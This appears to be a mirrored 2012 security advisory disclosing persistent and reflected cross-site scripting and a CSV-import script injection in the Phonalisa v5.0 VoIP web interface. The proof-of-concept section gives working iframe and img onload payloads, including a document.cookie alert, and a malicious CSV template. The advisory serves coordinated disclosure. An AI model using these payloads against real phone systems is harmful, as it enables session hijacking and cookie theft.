Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28312
HistoryJul 16, 2012 - 12:00 a.m.

Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities

2012-07-1600:00:00
vulners.com
91

Title:

Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities

Date:

2012-06-16

References:

http://www.vulnerability-lab.com/get_content.php?id=526

VL-ID:

526

Common Vulnerability Scoring System:

6.5

Introduction:

Die Revolution Ihrer Unternehmenskommunikation. Phonalisa ist ein IP-Telefonsystem, welches
schon heute alle Anspruche von morgen erfullt. In Phonalisa 5 wurde Vieles noch besser gemacht!
Zu den Highlights zahlen u.a. ein neues noch flexibleres Rufumleitungssystem, noch mehr
unterstutzte Endgerate und vieles mehr!

  • Makeln, Weiterleiten, Ruckfrage, Anklopfen, Konferenz
  • Pickup von Gesprachen
  • Pickup-Gruppen
  • Call-Box (Wahlbox) fur Direktwahl eingegebener Rufnummern
  • Eingabe einer Prasenz - welche im Warteschlangen-Monitor angezeigt wird (z.B. Konferenz,…)
  • Zentraler Abwurfplatz
  • Zentrale Anruflisten
  • CLIR (Rufnummer - Unterdruckung) getrennt (extern/intern) konfigurierbar
  • CLIP no screening - angezeigte Rufnummer (extern/intern) anderbar
  • Ruckruf bei „besetzt“/“frei“ - im internen Telefonsystem
  • Integrierter Instant Messaging Server

Alle von Phonalisa unterstutzten Modelle werden automatisch Konfiguriert. Phonalisa kann Endgerate
automatisch fur Sie konfigurieren. Sie mussen nur einen neuen Benutzer uber die WebUI anlegen und
direkt am Telefon anmelden. Schon kann telefoniert werden.

(Copy of the Vendor Homepage: http://www.phonalisa.de/funktionen )

Abstract:

The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Phonalisa v5 VoiP Phone Application.

Report-Timeline:

2012-05-01: Researcher Notification & Coordination
2012-05-02: Vendor Notification
2012-05-05: Vendor Response/Feedback
2012-06-10: Vendor Fix/Patch via Update
2012-06-15: Public or Non-Public Disclosure

Status:

Published

Affected Products:

AereA NetworX UG
Product: Phonalisa VoIP v5.0

Exploitation-Technique:

Remote

Severity:

High

Details:

1.1
Multiple persistent input validation vulnerabilities are detected in Phonalisa v5 VoiP Phone Application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action. When exploited by an authenticated user, the
identified vulnerabilities can result in information disclosure via error, session hijacking, access to available
phone line services, manipulated persistent context execution out of the auto route listings for sip gateways.
The vulnerabilities are located in the Routing, Fax and Groups section of the sip phone application and the
vulnerable bound parameters faxnumber or groups title.

Vulnerable Module(s):
[+] Routing - Erweiterte Parameter fur das SIP-Gateway [Parameter|Wert]
[+] Fax - Fax sending > Faxnummer Input & Output Listing
[+] Groups Input & Listing - Title (Name)

vulnerable Parameter(s):
[+] faxnumber
[+] groups title
[+] routinggws-sip

1.2
Multiple non persistent cross site scripting vulnerabilities are detected in Phonalisa v5 VoiP Phone Application.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing
& client-side content request manipulation.

Vulnerable Module(s):
[+] ?s=
[+] mac= & phone_type=
[+] sudo=
[+] pbx_id=

1.3
A persistent code execution vulnerability & validation bug is detected in Phonalisa v5 VoiP Phone Application.
The vulnerability allows privileged attackers to execute or inject script code on application side by
exporting/importing a manipulated .csv files. Another effect is the vulnerable listing which executes
the persistent code of the .csv unfilterted on application side.

Vulnerable Module(s):
[+] Addressbook > Contacts > Input & Output Listing

Vulnerable Module(s):
[+] Company:First & Name:Surname

Vulnerable Parameter(s):
[+] addressbookaddressbook&sudo=su

Proof of Concept:

1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with privileged account &
with low required user inter action. For demonstration or reproduce …

Review: Groups Input & Listing - Title (Name)

<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Lizenziert%20
f%C3%BCr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-
Lizenz3-Dateien/[PERSISTENT SCRIPT CODE])' <<="" td="">
<td>user</td>
<td>0</td>

URL: http://phone.server.de/?s=admingroups&amp;sudo=su

Review: Fax - Fax sending > Faxnummer Output Listing

<td><input name="faxnumber" type="text"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem
%20-%20Lizenziert%20f%C3%BCr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer
-Lizenz-Dateien/[PERSISTENT SCRIPT CODE])' <"="" style="width: 250px;"></td>
</tr>
<tr>

URL: http://phone.server.de/?s=faxsend&amp;sudo=su

Review: Routing - Erweiterte Parameter fur das SIP-Gateway [Parameter|Wert]

<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Lizenziert%20f%C3%B
Cr%20AereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-Lizenz4-Dateien/a.htm" onload='alert("VL")' <<=""

td=""><td>"><[PERSISTENT SCRIPT CODE]) <</td><td><a
href="/?s=routinggws-sip&m=gws-sip&sudo=su&deleteparam=%22%3E%3C
iframe%20src%3Da%20onload%3Dalert%28%22VL%22%29%20%3C&deletevalue=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VL
%22%29%20%3C&action=delextended&extended=show&gw-title=&gw-id=10"
title="loschen" onclick="return confirm_delete();"><img
alt="entfernen" src="/crystal-svg/16/act/editdelete.png"
/></a></td></tr><tr><td>allow<
/td><td>alaw</td><td><a

URL: http://phone.server.de/?s=routinggws-sip&amp;sudo=su

1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required
user inter action. For demonstration or reproduce …

PoC:

http://phonalisa.127.0.0.1:8080/?s=monitorqueues&amp;sudo=su&#37;22&#37;3E&#37;3Ciframe&#37;20src=a&#37;20onload=alert&#37;28document.cookie&#37;29&#37;20&#37;3C

http://phonalisa.127.0.0.1:8080/?s=monitorqueues&amp;sudo=su&#37;22&#37;3E&#37;3Ciframe&#37;20src=a&#37;20onload=alert&#37;28&#37;22VL&#37;22&#37;29&#37;20&#37;3C

http://phonalisa.127.0.0.1:8080/?s=home&amp;m=home&amp;sudo=&#37;22&#37;3E&#37;3Cimg&#37;20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-
owned-headonfire.jpg%20onload=alert%28123%29;%20/%3E&setlang=en-us

http://phonalisa.127.0.0.1:8080/?s=home&amp;m=home&amp;sudo=&#37;22&#37;3E&#37;3Cimg&#37;20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-
owned-headonfire.jpg%20/%3E&setlang=en-us

http://phonalisa.127.0.0.1:8080/?s=provphones&amp;m=phones&amp;sudo=su&amp;mac=&#37;22&#37;3E&#37;3Ciframe&#37;20src=a&#37;20onload=alert&#37;28&#37;22VL
%22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a
%20onload=alert%28%22VL%22%29%20%3C

http://phonalisa.127.0.0.1:8080/&amp;mac=&#37;22&#37;3E&#37;3Ciframe&#37;20src=a&#37;20onload=alert&#37;28&#37;22VL&#37;22&#37;29&#37;20&#37;3C&amp;sudo=su§ion=
%2Fprov%2Fcisco

1.3
The file code execution vulnerability can be exploited by privileged attackers without required user inter action.
For demonstration or reproduce …

Review: Addressbook - Contacts [Company:First name:Surname] Input & Output Listing

<tbody><tr style="line-height: 19px;">
<td>"><iframe src="Phonalisa%205%20IP%20Telekommunikationssytem%20-%20Licensed%20forA
ereA%20NetworX%20UG%20%28haftungsbeschr%C3%A4nkt%29%20-%20100%20Benutzer-Lizenz-Dateien/x.htm"
[CODE EXECUTION]' <<br="">"><[CODE EXECUTION] < "><[CODE EXECUTION]
<<br></td><td>CEO<br></td>
<td></td><td><a
href="/srv/pb-dial.php?n=000000000000" title="dial"><img
alt="dial" src="/crystal-svg/16/app/phone.png" /></a>

+490000000000<br></td><td></td><td>&
lt;/td><td><center><a

PoC: poc.csv

Surname;First name;Company;Position;Street;ZIP;City;Mobil;Private;Business;Fax;Mobil;Private;Business;Fax;E-Mail
"[CODE EXECUTION]<;[CODE EXECUTION];[CODE EXECUTION];CEO;;;;+490000000000;;;;00490000000000;;;;

URL: http://phone.127.0.0.1:8080.de/?s=addressbookaddressbook&sudo=su[CODE EXECUTION]

Risk:

1.1
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).

1.2
The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+).

1.3
The security risk of the persistent code execution vulnerability via csv import/export is estimated as high(-).

Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected])

Disclaimer:

The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

                                            Copyright © 2012 Vulnerability-Lab


VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: [email protected]